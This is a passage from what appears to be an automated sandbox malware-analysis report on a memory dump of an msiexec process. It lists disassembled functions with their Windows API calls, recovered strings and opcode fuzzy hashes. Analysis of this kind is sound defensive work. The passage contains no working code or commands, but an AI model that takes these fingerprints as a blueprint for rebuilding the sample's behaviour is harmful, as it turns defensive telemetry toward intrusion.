                                                                                                                                                                                                          • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                          • String ID: ($d
                                                                                                                                                                                                          • API String ID: 1140211610-1915259565
                                                                                                                                                                                                          • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3015003838-0
                                                                                                                                                                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                          Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                          • String ID: 3A
                                                                                                                                                                                                          • API String ID: 3300951397-293699754
                                                                                                                                                                                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                                                                                                          • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                          Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                          • String ID: BIN
                                                                                                                                                                                                          • API String ID: 1668488027-1015027815
                                                                                                                                                                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                          Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                          • API String ID: 776488737-1622828088
                                                                                                                                                                                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID: -journal$-wal
                                                                                                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                                                                                                          • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4218492932-0
                                                                                                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                          Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                          Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                          • String ID: 6$\
                                                                                                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                          Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
